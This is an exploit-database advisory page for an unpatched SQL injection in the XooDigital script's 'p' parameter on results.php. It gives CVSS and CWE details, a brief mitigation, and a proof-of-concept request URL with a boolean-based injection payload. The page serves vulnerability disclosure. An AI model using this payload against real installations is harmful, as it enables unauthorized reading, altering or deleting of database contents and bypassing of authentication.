header-logo
Suggest Exploit
vendor:
XooDigital
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: XooDigital
Affected Version From: Lastest
Affected Version To: Lastest
Patch Exists: NO
Related CWE: N/A
CPE: a:xooscripts:xoodigital
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

XooDigital – ‘p’ SQL Injection

XooDigital is vulnerable to SQL injection in the 'p' parameter of the results.php page. An attacker can inject arbitrary SQL code into the 'p' parameter of the results.php page and execute it in the backend database. This can be exploited to bypass authentication, access, modify and delete data within the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: XooDigital - 'p' SQL Injection
# Date: 26.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://xooscripts.com/product/digital-download-protection-script.html
# Demo Site: http://xooscripts.com/demos/xoodigital/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC : SQLi -----

Request: http://localhost/[PATH]/results.php?p=1
Vulnerable Parameter: p (GET)
Payload: p=1') OR NOT 7970=7970#

Navigation

Suggest Exploit

Services By CQR